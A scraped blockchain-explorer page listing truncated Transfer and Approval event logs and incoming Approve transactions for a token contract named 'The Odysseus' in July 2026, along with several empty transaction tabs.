| 0xed0ba1…ac0f3b | 27 days agoSun, 19 Jul 2026 13:57:26 UTC | Transfer | [0] 0x000000000000…f11fb6d8 [1] 0x000000000000…eb649eba data: 0x000000000000000000…ce6f7821 |
| 0xa00116…3dfdd3 | 27 days agoSun, 19 Jul 2026 13:56:23 UTC | Transfer | [0] 0x000000000000…59e7d8ef [1] 0x000000000000…f11fb6d8 data: 0x000000000000000000…56fe4957 |
| 0xa00116…3dfdd3 | 27 days agoSun, 19 Jul 2026 13:56:23 UTC | Approval | [0] 0x000000000000…59e7d8ef [1] 0x000000000000…eb649eba data: 0x000000000000000000…56fe4957 |
| 0xa00116…3dfdd3 | 27 days agoSun, 19 Jul 2026 13:56:23 UTC | Transfer | [0] 0x000000000000…68986397 [1] 0x000000000000…59e7d8ef data: 0x000000000000000000…56fe4957 |
| 0x7a2791…200dcb | 27 days agoSun, 19 Jul 2026 13:56:22 UTC | Approval | [0] 0x000000000000…68986397 [1] 0x000000000000…59e7d8ef data: 0xffffffffffffffffff…ffffffff |
| 0x1f3888…9b5c8c | 27 days agoSun, 19 Jul 2026 13:56:09 UTC | Transfer | [0] 0x000000000000…f11fb6d8 [1] 0x000000000000…f4d6b244 data: 0x000000000000000000…02ee38b1 |
| 0x82092f…0c7e18 | 27 days agoSun, 19 Jul 2026 13:56:08 UTC | Transfer | [0] 0x000000000000…f11fb6d8 [1] 0x000000000000…f4d6b244 data: 0x000000000000000000…660234b4 |
| 0x157a4e…abcf38 | 27 days agoSun, 19 Jul 2026 13:55:46 UTC | Transfer | [0] 0x000000000000…59e7d8ef [1] 0x000000000000…f11fb6d8 data: 0x000000000000000000…50342332 |
| 0x157a4e…abcf38 | 27 days agoSun, 19 Jul 2026 13:55:46 UTC | Approval | [0] 0x000000000000…59e7d8ef [1] 0x000000000000…eb649eba data: 0x000000000000000000…50342332 |
| 0x157a4e…abcf38 | 27 days agoSun, 19 Jul 2026 13:55:46 UTC | Transfer | [0] 0x000000000000…da06e363 [1] 0x000000000000…59e7d8ef data: 0x000000000000000000…50342332 |
| 0xd06bb4…26abaf | 27 days agoSun, 19 Jul 2026 13:55:45 UTC | Transfer | [0] 0x000000000000…f11fb6d8 [1] 0x000000000000…f4d6b244 data: 0x000000000000000000…b696e703 |
| 0x34514e…816e7f | 27 days agoSun, 19 Jul 2026 13:55:44 UTC | Transfer | [0] 0x000000000000…f11fb6d8 [1] 0x000000000000…1517187c data: 0x000000000000000000…0b13ec2e |
| 0x708391…9ce763 | 27 days agoSun, 19 Jul 2026 13:55:28 UTC | Transfer | [0] 0x000000000000…f11fb6d8 [1] 0x000000000000…d73c71c0 data: 0x000000000000000000…7f5afa0b |
| 0xc3cfde…ffea71 | 27 days agoSun, 19 Jul 2026 13:55:25 UTC | Transfer | [0] 0x000000000000…59e7d8ef [1] 0x000000000000…f11fb6d8 data: 0x000000000000000000…1f5f1a45 |
| 0xc3cfde…ffea71 | 27 days agoSun, 19 Jul 2026 13:55:25 UTC | Approval | [0] 0x000000000000…59e7d8ef [1] 0x000000000000…eb649eba data: 0x000000000000000000…1f5f1a45 |
| 0xc3cfde…ffea71 | 27 days agoSun, 19 Jul 2026 13:55:25 UTC | Transfer | [0] 0x000000000000…80b34bd3 [1] 0x000000000000…59e7d8ef data: 0x000000000000000000…1f5f1a45 |
| 0xc5279f…d7eeea | 27 days agoSun, 19 Jul 2026 13:55:24 UTC | Approval | [0] 0x000000000000…80b34bd3 [1] 0x000000000000…59e7d8ef data: 0xffffffffffffffffff…ffffffff |
| 0xb74077…83c007 | 27 days agoSun, 19 Jul 2026 13:55:24 UTC | Transfer | [0] 0x000000000000…59e7d8ef [1] 0x000000000000…f11fb6d8 data: 0x000000000000000000…7253a788 |
| 0xb74077…83c007 | 27 days agoSun, 19 Jul 2026 13:55:24 UTC | Approval | [0] 0x000000000000…59e7d8ef [1] 0x000000000000…eb649eba data: 0x000000000000000000…7253a788 |
| 0xb74077…83c007 | 27 days agoSun, 19 Jul 2026 13:55:24 UTC | Transfer | [0] 0x000000000000…142ac5e0 [1] 0x000000000000…59e7d8ef data: 0x000000000000000000…7253a788 |
| 0x727b51…44e6c5 | 27 days agoSun, 19 Jul 2026 13:55:22 UTC | Transfer | [0] 0x000000000000…59e7d8ef [1] 0x000000000000…f11fb6d8 data: 0x000000000000000000…735eeeb0 |
| 0x727b51…44e6c5 | 27 days agoSun, 19 Jul 2026 13:55:22 UTC | Approval | [0] 0x000000000000…59e7d8ef [1] 0x000000000000…eb649eba data: 0x000000000000000000…735eeeb0 |
| Block | Age | Parent Transaction Hash | Type | Method | From | To | Value | |
|---|---|---|---|---|---|---|---|---|
| no internal transactions found for this address yet (traced blocks + on-demand) | ||||||||
| Transaction Hash | Method | Block | Age | From | To | Amount | Token | ||
|---|---|---|---|---|---|---|---|---|---|
| no token transfers for this address yet | |||||||||
| Type | Age | Block | Details |
|---|---|---|---|
| no cross-chain L1↔L2 transactions for this address | |||
| Transaction Hash | Method | Block | Age | From | To | Type | Item | ||
|---|---|---|---|---|---|---|---|---|---|
| no NFT transfers for this address yet | |||||||||
| Transaction Hash | Method ? | Block | Age | From | To | Amount | Txn Fee ? | ||
|---|---|---|---|---|---|---|---|---|---|
| 0x7a2791…200dcb | Approve | 13,893,160 | 27 days agoSun, 19 Jul 2026 13:56:22 UTC | 0x8d65…6397 | IN | The Odysseus | $0.000 ETH | 0.00000257 | |
| 0xc5279f…d7eeea | Approve | 13,892,572 | 27 days agoSun, 19 Jul 2026 13:55:24 UTC | 0x683a…4bd3 | IN | The Odysseus | $0.000 ETH | 0.00000257 | |
| 0xade587…c99c2b | Approve | 13,892,541 | 27 days agoSun, 19 Jul 2026 13:55:20 UTC | 0x6375…c5e0 | IN | The Odysseus | $0.000 ETH | 0.00000259 | |
| 0x0e41fd…7787ce | Approve | 13,892,458 | 27 days agoSun, 19 Jul 2026 13:55:12 UTC | 0x9139…e74a | IN | The Odysseus | $0.000 ETH | 0.00000257 | |
| 0xf93b00…3bf33a | Approve | 13,892,059 | 27 days agoSun, 19 Jul 2026 13:54:32 UTC | 0xfbcd…d59c | IN | The Odysseus | $0.000 ETH | 0.00000257 | |
| 0x461978…abadd1 | Approve | 13,892,055 | 27 days agoSun, 19 Jul 2026 13:54:32 UTC | 0x2b5d…4e61 | IN | The Odysseus | $0.000 ETH | 0.00000257 | |
| 0x7d5ef5…860dd2 | Approve | 13,891,559 | 27 days agoSun, 19 Jul 2026 13:53:42 UTC | 0xe53b…ad03 | IN | The Odysseus | $0.000 ETH | 0.00000257 | |
| 0x194668…869b66 | Approve | 13,891,219 | 27 days agoSun, 19 Jul 2026 13:53:08 UTC | 0xbaac…01af | IN | The Odysseus | $0.000 ETH | 0.00000259 | |
| 0x8cd7d8…b01e81 | Approve | 13,890,827 | 27 days agoSun, 19 Jul 2026 13:52:28 UTC | 0x8da1…23a1 | IN | The Odysseus | $0.000 ETH | 0.00000262 | |
| 0x0ec8af…94da34 | Approve | 13,890,806 | 27 days agoSun, 19 Jul 2026 13:52:26 UTC | 0x1b84…e7be | IN | The Odysseus | $0.000 ETH | 0.00000260 | |
| 0x505b86…1fcd40 | Approve | 13,890,691 | 27 days agoSun, 19 Jul 2026 13:52:14 UTC | 0x25f8…e98a | IN | The Odysseus | $0.000 ETH | 0.00000259 | |
| 0x747167…38faf5 | Approve | 13,890,471 | 27 days agoSun, 19 Jul 2026 13:51:52 UTC | 0xe75d…3caa | IN | The Odysseus | $0.000 ETH | 0.00000258 | |
| 0x73fe24…c33cff | Approve | 13,890,390 | 27 days agoSun, 19 Jul 2026 13:51:44 UTC | 0x5b47…c0d8 | IN | The Odysseus | $0.000 ETH | 0.00000257 | |
| 0xe66700…ae640e | Approve | 13,890,348 | 27 days agoSun, 19 Jul 2026 13:51:40 UTC | 0xab87…1c31 | IN | The Odysseus | $0.000 ETH | 0.00000258 | |
| 0x03bc84…65f632 | Approve | 13,890,284 | 27 days agoSun, 19 Jul 2026 13:51:33 UTC | 0xb184…73fa | IN | The Odysseus | $0.000 ETH | 0.00000149 | |
| 0xe16230…d967fb | Approve | 13,890,284 | 27 days agoSun, 19 Jul 2026 13:51:33 UTC | 0xb184…73fa | IN | The Odysseus | $0.000 ETH | 0.00000258 | |
| 0xff662e…bd6c02 | Approve | 13,890,281 | 27 days agoSun, 19 Jul 2026 13:51:33 UTC | 0x79fb…63eb | IN | The Odysseus | $0.000 ETH | 0.00000257 | |
| 0xb6874d…e8e56c | Approve | 13,890,277 | 27 days agoSun, 19 Jul 2026 13:51:33 UTC | 0x5abc…9ad8 | IN | The Odysseus | $0.000 ETH | 0.00000257 | |
| 0x8b1901…a530ba | Approve | 13,890,275 | 27 days agoSun, 19 Jul 2026 13:51:33 UTC | 0xbca5…256a | IN | The Odysseus | $0.000 ETH | 0.00000258 | |
| 0xeca157…08c0e6 | Transfer From | 13,889,195 | 27 days agoSun, 19 Jul 2026 13:49:44 UTC | 0x0f22…29be | IN | The Odysseus | $0.000 ETH | 0.00000266 | |
| 0x618e3f…96ce78 | Approve | 13,888,588 | 27 days agoSun, 19 Jul 2026 13:48:44 UTC | 0x598e…7475 | IN | The Odysseus | $0.000 ETH | 0.00000257 | |
| 0x3a6a90…c8d33e | Approve | 13,887,033 | 27 days agoSun, 19 Jul 2026 13:46:07 UTC | 0x3e68…389f | IN | The Odysseus | $0.000 ETH | 0.00000150 | |
| 0x8e93c8…53d205 | Approve | 13,887,025 | 27 days agoSun, 19 Jul 2026 13:46:07 UTC | 0x3e68…389f | IN | The Odysseus | $0.000 ETH | 0.00000257 | |
| 0x526c24…6f8d9b | Approve | 13,886,960 | 27 days agoSun, 19 Jul 2026 13:46:00 UTC | 0x5b9a…6d53 | IN | The Odysseus | $0.000 ETH | 0.00000258 | |
| 0xd6d7d2…fbd10b | Approve | 13,886,270 | 27 days agoSun, 19 Jul 2026 13:44:51 UTC | 0x22c0…5ce8 | IN | The Odysseus | $0.000 ETH | 0.00000257 |